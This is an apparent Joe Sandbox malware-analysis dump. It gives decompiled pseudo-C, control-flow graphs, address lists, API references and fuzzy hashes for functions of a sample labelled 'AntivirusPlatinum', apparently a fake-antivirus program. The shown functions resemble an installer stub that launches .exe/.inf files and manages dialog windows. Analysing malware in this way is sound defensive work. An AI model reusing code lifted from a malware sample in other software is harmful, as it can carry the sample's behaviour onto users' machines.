                                                                                                                                                              					goto L19;
                                                                                                                                                              				}
                                                                                                                                                              			}
























                                                                                                                                                              0x0040bd8a
                                                                                                                                                              0x0040bd8d
                                                                                                                                                              0x0040bd97
                                                                                                                                                              0x0040bf96
                                                                                                                                                              0x0040bf96
                                                                                                                                                              0x0040bda1
                                                                                                                                                              0x0040bdaa
                                                                                                                                                              0x0040bdaf
                                                                                                                                                              0x0040bdb1
                                                                                                                                                              0x0040bdb4
                                                                                                                                                              0x0040bdbe
                                                                                                                                                              0x0040bdc8
                                                                                                                                                              0x0040bdc0
                                                                                                                                                              0x0040bdc3
                                                                                                                                                              0x0040bdc3
                                                                                                                                                              0x0040bdcb
                                                                                                                                                              0x0040bdcf
                                                                                                                                                              0x0040be10
                                                                                                                                                              0x0040be13
                                                                                                                                                              0x0040be1d
                                                                                                                                                              0x0040be1d
                                                                                                                                                              0x0040be27
                                                                                                                                                              0x0040be2e
                                                                                                                                                              0x0040be33
                                                                                                                                                              0x0040be38
                                                                                                                                                              0x0040be40
                                                                                                                                                              0x0040be45
                                                                                                                                                              0x0040be47
                                                                                                                                                              0x0040be49
                                                                                                                                                              0x0040be49
                                                                                                                                                              0x0040be47
                                                                                                                                                              0x0040be54
                                                                                                                                                              0x0040be59
                                                                                                                                                              0x0040be5e
                                                                                                                                                              0x0040be6a
                                                                                                                                                              0x0040be75
                                                                                                                                                              0x0040be75
                                                                                                                                                              0x0040be7b
                                                                                                                                                              0x0040beb7
                                                                                                                                                              0x0040bec1
                                                                                                                                                              0x0040beca
                                                                                                                                                              0x0040bee9
                                                                                                                                                              0x0040beef
                                                                                                                                                              0x0040bef2
                                                                                                                                                              0x0040bef8
                                                                                                                                                              0x0040beff
                                                                                                                                                              0x0040bf06
                                                                                                                                                              0x0040bf1a
                                                                                                                                                              0x0040bf1c
                                                                                                                                                              0x0040bf1c
                                                                                                                                                              0x0040bf28
                                                                                                                                                              0x0040bf31
                                                                                                                                                              0x0040bf31
                                                                                                                                                              0x0040bf39
                                                                                                                                                              0x0040bf42
                                                                                                                                                              0x0040bf55
                                                                                                                                                              0x0040bf55
                                                                                                                                                              0x0040bf5b
                                                                                                                                                              0x0040bf6b
                                                                                                                                                              0x0040bf77
                                                                                                                                                              0x0040bf77
                                                                                                                                                              0x0040bf7d
                                                                                                                                                              0x0040bf62
                                                                                                                                                              0x0040bf7d
                                                                                                                                                              0x0040bf7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bf44
                                                                                                                                                              0x0040bf4c
                                                                                                                                                              0x0040bf53
                                                                                                                                                              0x0040bf83
                                                                                                                                                              0x0040bf86
                                                                                                                                                              0x0040bf90
                                                                                                                                                              0x0040bf90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bf86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bf53
                                                                                                                                                              0x0040bf42
                                                                                                                                                              0x0040becc
                                                                                                                                                              0x0040bed7
                                                                                                                                                              0x0040bede
                                                                                                                                                              0x0040bee3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040be7d
                                                                                                                                                              0x0040be7d
                                                                                                                                                              0x0040be80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040be8c
                                                                                                                                                              0x0040be9d
                                                                                                                                                              0x0040beaa
                                                                                                                                                              0x0040beb1
                                                                                                                                                              0x0040bf92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bf93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040beb1
                                                                                                                                                              0x0040bdd1
                                                                                                                                                              0x0040bdd1
                                                                                                                                                              0x0040bdd3
                                                                                                                                                              0x0040bdd6
                                                                                                                                                              0x0040bdec
                                                                                                                                                              0x0040bdf0
                                                                                                                                                              0x0040be03
                                                                                                                                                              0x0040be05
                                                                                                                                                              0x0040be08
                                                                                                                                                              0x0040be0a
                                                                                                                                                              0x0040be0a
                                                                                                                                                              0x0040be0c
                                                                                                                                                              0x0040be0c
                                                                                                                                                              0x0040be0d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bdf0
                                                                                                                                                              0x0040bde0
                                                                                                                                                              0x0040bde0
                                                                                                                                                              0x0040bde4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bdda
                                                                                                                                                              0x0040bdde
                                                                                                                                                              0x0040bde8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bde8
                                                                                                                                                              0x0040bdde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bdf9
                                                                                                                                                              0x0040bdf9
                                                                                                                                                              0x0040bdfa
                                                                                                                                                              0x0040bdfd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040be01

                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteExA.SHELL32(?,?,00000000,?,?,00000000,0000003C), ref: 0040BEC1
                                                                                                                                                              • ShellExecuteExA.SHELL32(?), ref: 0040BEDA
                                                                                                                                                              • IsWindowVisible.USER32 ref: 0040BF09
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040BF1A
                                                                                                                                                              • WaitForInputIdle.USER32 ref: 0040BF28
                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 0040BF39
                                                                                                                                                              • Sleep.KERNEL32(-000003E9), ref: 0040BF7D
                                                                                                                                                              • ShowWindow.USER32(00000001), ref: 0040BF90
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$ExecuteShellShow$CloseHandleIdleInputSleepVisibleWait
                                                                                                                                                              • String ID: .exe$.inf$H&A
                                                                                                                                                              • API String ID: 1160896117-531445332
                                                                                                                                                              • Opcode ID: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                              • Instruction ID: a16589b2b5277c8e661bbc98e08cb4bbb4dd1f4ec6966d8106822106ff6d3530
                                                                                                                                                              • Opcode Fuzzy Hash: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                              • Instruction Fuzzy Hash: 5351B171845289BEDB21EBA0DC44ADE7BA9EF04304F1484BBE540F72D2D3798D858B9D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 838 40970e-409766 call 409637 GetWindowRect GetClientRect 841 409768-40976c 838->841 842 40979b-40979f 838->842 843 4097db-4097fa GetSystemMetrics GetWindow 841->843 844 40976e-409795 SetWindowPos 841->844 842->843 845 4097a1-4097d5 GetWindowTextA call 409553 SetWindowTextA 842->845 846 4098d1-4098d3 843->846 844->842 845->843 849 4098d9-4098dd 846->849 850 4097ff-409806 846->850 850->849 851 40980c-409828 GetWindowTextA 850->851 852 40982a-409849 call 409553 SetWindowTextA 851->852 853 40984f-409853 851->853 852->853 855 409855-4098b5 GetWindowRect SetWindowPos 853->855 856 4098bb-4098cc GetWindow 853->856 855->856 856->849 858 4098ce 856->858 858->846
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E0040970E(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				struct HWND__* _v24;
                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                              				struct tagRECT _v56;
                                                                                                                                                              				struct tagRECT _v72;
                                                                                                                                                              				char _v1096;
                                                                                                                                                              				signed int _t96;
                                                                                                                                                              				struct HWND__* _t98;
                                                                                                                                                              				signed int _t116;
                                                                                                                                                              				signed int _t123;
                                                                                                                                                              				signed int _t147;
                                                                                                                                                              				signed int _t150;
                                                                                                                                                              				signed int _t153;
                                                                                                                                                              				void* _t163;
                                                                                                                                                              				void* _t167;
                                                                                                                                                              				void* _t168;
                                                                                                                                                              
                                                                                                                                                              				_v20 = __ecx;
                                                                                                                                                              				_v5 = E00409637(__ecx, __eflags, _a8,  &_v16,  &_v12);
                                                                                                                                                              				GetWindowRect(_a4,  &_v40);
                                                                                                                                                              				GetClientRect(_a4,  &_v72);
                                                                                                                                                              				_t96 = _v72.bottom;
                                                                                                                                                              				_t163 = _v40.right - _v72.right - _v40.left + 1;
                                                                                                                                                              				_t167 = _v40.bottom - _t96 - _v40.top + 1;
                                                                                                                                                              				if(_v5 == 0) {
                                                                                                                                                              					L3:
                                                                                                                                                              					if(_a12 == 0) {
                                                                                                                                                              						GetWindowTextA(_a4,  &_v1096, 0x400);
                                                                                                                                                              						E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                              						SetWindowTextA(_a4,  &_v1096); // executed
                                                                                                                                                              					}
                                                                                                                                                              					L5:
                                                                                                                                                              					_t168 = _t167 - GetSystemMetrics(8);
                                                                                                                                                              					_t98 = GetWindow(_a4, 5);
                                                                                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                                                                                              					_a12 = _t98;
                                                                                                                                                              					_v24 = _t98;
                                                                                                                                                              					while(_t98 != 0) {
                                                                                                                                                              						__eflags = _a4 - 0x200;
                                                                                                                                                              						if(_a4 >= 0x200) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						GetWindowTextA(_a12,  &_v1096, 0x400); // executed
                                                                                                                                                              						__eflags = _v1096;
                                                                                                                                                              						if(_v1096 != 0) {
                                                                                                                                                              							E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                              							SetWindowTextA(_a12,  &_v1096); // executed
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v5;
                                                                                                                                                              						if(_v5 != 0) {
                                                                                                                                                              							GetWindowRect(_a12,  &_v56);
                                                                                                                                                              							_push(0x204);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t147 = 0x64;
                                                                                                                                                              							_push((_v56.bottom - _v56.top + 1) * _v12 / _t147);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_push((_v56.right - _v56.left + 1) * _v16 / _t147);
                                                                                                                                                              							_t116 = (_v56.top - _v40.top - _t168) * _v12;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_push(_t116 / _t147);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t123 = (_v56.left - (_t163 - _t116 % _t147 >> 1) - _v40.left) * _v16;
                                                                                                                                                              							_t150 = 0x64;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							__eflags = _t123 % _t150;
                                                                                                                                                              							SetWindowPos(_a12, 0, _t123 / _t150, ??, ??, ??, ??);
                                                                                                                                                              						}
                                                                                                                                                              						_t98 = GetWindow(_a12, 2);
                                                                                                                                                              						_a12 = _t98;
                                                                                                                                                              						__eflags = _t98 - _v24;
                                                                                                                                                              						if(_t98 == _v24) {
                                                                                                                                                              							break;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t87 =  &_a4;
                                                                                                                                                              							 *_t87 = _a4 + 1;
                                                                                                                                                              							__eflags =  *_t87;
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					return _t98;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              				_push(0x206);
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t153 = 0x64;
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				SetWindowPos(_a4, 0, 0, 0, _v72.right * _v16 / _t153 + _t163, _t96 * _v12 / _t153 + _t167, ??);
                                                                                                                                                              				goto L3;
                                                                                                                                                              			}






















                                                                                                                                                              0x00409725
                                                                                                                                                              0x00409733
                                                                                                                                                              0x0040973d
                                                                                                                                                              0x00409746
                                                                                                                                                              0x00409755
                                                                                                                                                              0x00409760
                                                                                                                                                              0x00409761
                                                                                                                                                              0x00409766
                                                                                                                                                              0x0040979b
                                                                                                                                                              0x0040979f
                                                                                                                                                              0x004097b0
                                                                                                                                                              0x004097c6
                                                                                                                                                              0x004097d5
                                                                                                                                                              0x004097d5
                                                                                                                                                              0x004097db
                                                                                                                                                              0x004097e8
                                                                                                                                                              0x004097ea
                                                                                                                                                              0x004097f0
                                                                                                                                                              0x004097f4
                                                                                                                                                              0x004097f7
                                                                                                                                                              0x004098d1
                                                                                                                                                              0x004097ff
                                                                                                                                                              0x00409806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040981b
                                                                                                                                                              0x00409821
                                                                                                                                                              0x00409828
                                                                                                                                                              0x0040983a
                                                                                                                                                              0x00409849
                                                                                                                                                              0x00409849
                                                                                                                                                              0x0040984f
                                                                                                                                                              0x00409853
                                                                                                                                                              0x0040985c
                                                                                                                                                              0x00409864
                                                                                                                                                              0x0040986e
                                                                                                                                                              0x00409871
                                                                                                                                                              0x00409874
                                                                                                                                                              0x00409880
                                                                                                                                                              0x00409883
                                                                                                                                                              0x0040988c
                                                                                                                                                              0x00409890
                                                                                                                                                              0x00409893
                                                                                                                                                              0x00409896
                                                                                                                                                              0x004098a7
                                                                                                                                                              0x004098ab
                                                                                                                                                              0x004098ac
                                                                                                                                                              0x004098ad
                                                                                                                                                              0x004098b5
                                                                                                                                                              0x004098b5
                                                                                                                                                              0x004098c0
                                                                                                                                                              0x004098c6
                                                                                                                                                              0x004098c9
                                                                                                                                                              0x004098cc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004098ce
                                                                                                                                                              0x004098ce
                                                                                                                                                              0x004098ce
                                                                                                                                                              0x004098ce
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004098ce
                                                                                                                                                              0x004098cc
                                                                                                                                                              0x004098dd
                                                                                                                                                              0x004098dd
                                                                                                                                                              0x0040976c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409772
                                                                                                                                                              0x00409777
                                                                                                                                                              0x0040977a
                                                                                                                                                              0x00409787
                                                                                                                                                              0x00409795
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowRect.USER32 ref: 0040973D
                                                                                                                                                              • GetClientRect.USER32 ref: 00409746
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000110,?,00000206,?,?,00000000), ref: 00409795
                                                                                                                                                              • GetWindowTextA.USER32 ref: 004097B0
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 004097D5
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004097DD
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 004097EA
                                                                                                                                                              • GetWindowTextA.USER32 ref: 0040981B
                                                                                                                                                              • SetWindowTextA.USER32(00000000,00000000), ref: 00409849
                                                                                                                                                              • GetWindowRect.USER32 ref: 0040985C
                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000110,00000200,00000110,00000200,00000204,?,?,00000000), ref: 004098B5
                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 004098C0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Text$Rect$ClientMetricsSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3650388129-0
                                                                                                                                                              • Opcode ID: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                              • Instruction ID: 4bbafb19eaccdd502d9e93db46d4c5b42238c20fbbadc0178a3eb5a30deeaea3
                                                                                                                                                              • Opcode Fuzzy Hash: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                              • Instruction Fuzzy Hash: 76512B72900209AFEF05DFA8CD49FEEBBB9EB48300F048066FA05E61A1D7759E55CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 859 40aafc-40ab0a call 406ea5 862 40ab10-40ab17 859->862 863 40ab9d-40ab9e 859->863 864 40ab56-40ab69 GetClassNameA 862->864 865 40ab19-40ab20 862->865 867 40ab6b-40ab7e lstrcmpiA 864->867 868 40ab8f-40ab91 864->868 865->863 866 40ab22-40ab2f GetModuleHandleA 865->866 869 40ab31-40ab3d GetProcAddress 866->869 870 40ab42-40ab54 866->870 871 40ab80-40ab8c FindWindowExA 867->871 872 40ab8e 867->872 873 40ab93-40ab95 868->873 874 40ab9c 868->874 869->870 870->863 870->864 871->872 872->868 873->874 874->863
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040AAFC(signed int __ecx, void* __eflags, long _a4) {
                                                                                                                                                              				char _v84;
                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                              				long _t8;
                                                                                                                                                              				struct HINSTANCE__* _t10;
                                                                                                                                                              				signed int _t12;
                                                                                                                                                              				long _t15;
                                                                                                                                                              				CHAR* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                              				_t6 = E00406EA5();
                                                                                                                                                              				if(_t6 >= 5) {
                                                                                                                                                              					if( *0x41f314 != 0) {
                                                                                                                                                              						L6:
                                                                                                                                                              						_t15 = _a4;
                                                                                                                                                              						_t8 = GetClassNameA(_t15,  &_v84, 0x50);
                                                                                                                                                              						if(_t8 != 0) {
                                                                                                                                                              							_t18 = "EDIT";
                                                                                                                                                              							_t8 = lstrcmpiA( &_v84, _t18);
                                                                                                                                                              							if(_t8 != 0) {
                                                                                                                                                              								_t8 = FindWindowExA(_t15, 0, _t18, 0); // executed
                                                                                                                                                              								_t15 = _t8;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						if(_t15 != 0) {
                                                                                                                                                              							_t8 = SHAutoComplete(_t15, 0x10); // executed
                                                                                                                                                              						}
                                                                                                                                                              						return _t8;
                                                                                                                                                              					}
                                                                                                                                                              					if( *0x41f312 == 0) {
                                                                                                                                                              						_t10 = GetModuleHandleA("shlwapi.dll");
                                                                                                                                                              						if(_t10 != 0) {
                                                                                                                                                              							 *0x41f314 = GetProcAddress(_t10, "SHAutoComplete");
                                                                                                                                                              						}
                                                                                                                                                              						_t6 =  *0x41f314; // 0x76646c70
                                                                                                                                                              						 *0x41f312 = _t12 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                              						if(_t6 != 0) {
                                                                                                                                                              							goto L6;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}










                                                                                                                                                              0x0040aafc
                                                                                                                                                              0x0040ab02
                                                                                                                                                              0x0040ab0a
                                                                                                                                                              0x0040ab17
                                                                                                                                                              0x0040ab56
                                                                                                                                                              0x0040ab57
                                                                                                                                                              0x0040ab61
                                                                                                                                                              0x0040ab69
                                                                                                                                                              0x0040ab6c
                                                                                                                                                              0x0040ab76
                                                                                                                                                              0x0040ab7e
                                                                                                                                                              0x0040ab86
                                                                                                                                                              0x0040ab8c
                                                                                                                                                              0x0040ab8c
                                                                                                                                                              0x0040ab8e
                                                                                                                                                              0x0040ab91
                                                                                                                                                              0x0040ab96
                                                                                                                                                              0x0040ab96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ab9c
                                                                                                                                                              0x0040ab20
                                                                                                                                                              0x0040ab27
                                                                                                                                                              0x0040ab2f
                                                                                                                                                              0x0040ab3d
                                                                                                                                                              0x0040ab3d
                                                                                                                                                              0x0040ab42
                                                                                                                                                              0x0040ab4c
                                                                                                                                                              0x0040ab54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ab54
                                                                                                                                                              0x0040ab20
                                                                                                                                                              0x0040ab9e

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • GetModuleHandleA.KERNEL32(shlwapi.dll), ref: 0040AB27
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB37
                                                                                                                                                              • GetClassNameA.USER32(?,?,00000050), ref: 0040AB61
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,EDIT,?), ref: 0040AB76
                                                                                                                                                              • FindWindowExA.USER32 ref: 0040AB86
                                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0040AB96
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressAutoClassCompleteFindHandleModuleNameProcVersionWindowlstrcmpi
                                                                                                                                                              • String ID: EDIT$SHAutoComplete$pldv`$shlwapi.dll
                                                                                                                                                              • API String ID: 1963989359-174982977
                                                                                                                                                              • Opcode ID: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                              • Instruction ID: cf58bb30e006859db208b778a9a0797c0316ea9abfae2e107aa60b4248c819fa
                                                                                                                                                              • Opcode Fuzzy Hash: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                              • Instruction Fuzzy Hash: 021186715003096BE7109B65AD45FEB3BBDAB45700F04803ABA05E21D0D7B8E565D66E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 964 40cb2b-40cb53 call 40309d 967 40cb73-40cb81 964->967 968 40cb55-40cb56 964->968 971 40cb83-40cb8c SendMessageA 967->971 972 40cb8e-40cb95 967->972 969 40cb66-40cb68 968->969 970 40cb58-40cb5d 968->970 975 40cc1e-40cc21 969->975 973 40cc12 970->973 974 40cb63-40cb64 970->974 971->972 976 40cba7-40cbf0 call 40ba36 GetDlgItem SendMessageA GetSysColor SendMessageA call 40bf99 972->976 977 40cb97-40cba1 SendDlgItemMessageA 972->977 979 40cc14-40cc15 EndDialog 973->979 974->969 978 40cb6d-40cb6e 974->978 976->973 985 40cbf2-40cc10 call 406d54 call 40a205 976->985 977->976 978->979 981 40cc1b-40cc1d 979->981 981->975 985->981
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0040CB2B(void* __ecx, void* __edx, void* __esi, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				long _t10;
                                                                                                                                                              				long _t11;
                                                                                                                                                              				long _t18;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				struct HWND__* _t32;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				struct HWND__* _t36;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              
                                                                                                                                                              				_t35 = __edx;
                                                                                                                                                              				_t36 = _a4;
                                                                                                                                                              				E0040309D(__edx, _t36, _a8, _a12, _a16, "LICENSEDLG", 0, 0); // executed
                                                                                                                                                              				_t9 = _a8 - 0x110;
                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                              					_t10 =  *0x4192d4; // 0x3d02d3
                                                                                                                                                              					_t38 = SendMessageA;
                                                                                                                                                              					__eflags = _t10;
                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                              						SendMessageA(_t36, 0x80, 1, _t10);
                                                                                                                                                              					}
                                                                                                                                                              					_t11 =  *0x4192d0; // 0x72050a15
                                                                                                                                                              					__eflags = _t11;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						SendDlgItemMessageA(_t36, 0x66, 0x172, 0, _t11); // executed
                                                                                                                                                              					}
                                                                                                                                                              					E0040BA36(_t35, __eflags, _t36);
                                                                                                                                                              					_t32 = GetDlgItem(_t36, 0x65);
                                                                                                                                                              					SendMessageA(_t32, 0x435, 0, 0x10000);
                                                                                                                                                              					SendMessageA(_t32, 0x443, 0, GetSysColor(0xf));
                                                                                                                                                              					E0040BF99(_t35, _t38, _t36,  *0x41a818, 3);
                                                                                                                                                              					_t18 =  *0x41a820;
                                                                                                                                                              					__eflags = _t18;
                                                                                                                                                              					if(_t18 == 0) {
                                                                                                                                                              						L12:
                                                                                                                                                              						_push(1);
                                                                                                                                                              						L13:
                                                                                                                                                              						EndDialog(_t36, ??); // executed
                                                                                                                                                              						goto L14;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t34 =  *0x418ec8; // 0x0
                                                                                                                                                              						E00406D54(_t34,  *0x414c74, _t32, _t18);
                                                                                                                                                              						E0040A205( *0x41a820);
                                                                                                                                                              						L14:
                                                                                                                                                              						__eflags = 1;
                                                                                                                                                              						return 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_t9 != 1) {
                                                                                                                                                              					L4:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t29 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t29 == 1) {
                                                                                                                                                              					_push(0);
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}












                                                                                                                                                              0x0040cb2b
                                                                                                                                                              0x0040cb30
                                                                                                                                                              0x0040cb46
                                                                                                                                                              0x0040cb4e
                                                                                                                                                              0x0040cb53
                                                                                                                                                              0x0040cb73
                                                                                                                                                              0x0040cb79
                                                                                                                                                              0x0040cb7f
                                                                                                                                                              0x0040cb81
                                                                                                                                                              0x0040cb8c
                                                                                                                                                              0x0040cb8c
                                                                                                                                                              0x0040cb8e
                                                                                                                                                              0x0040cb93
                                                                                                                                                              0x0040cb95
                                                                                                                                                              0x0040cba1
                                                                                                                                                              0x0040cba1
                                                                                                                                                              0x0040cba8
                                                                                                                                                              0x0040cbbd
                                                                                                                                                              0x0040cbc5
                                                                                                                                                              0x0040cbd8
                                                                                                                                                              0x0040cbe3
                                                                                                                                                              0x0040cbe8
                                                                                                                                                              0x0040cbee
                                                                                                                                                              0x0040cbf0
                                                                                                                                                              0x0040cc12
                                                                                                                                                              0x0040cc12
                                                                                                                                                              0x0040cc14
                                                                                                                                                              0x0040cc15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cbf2
                                                                                                                                                              0x0040cbf2
                                                                                                                                                              0x0040cc00
                                                                                                                                                              0x0040cc0b
                                                                                                                                                              0x0040cc1b
                                                                                                                                                              0x0040cc1d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cc1d
                                                                                                                                                              0x0040cbf0
                                                                                                                                                              0x0040cb56
                                                                                                                                                              0x0040cb66
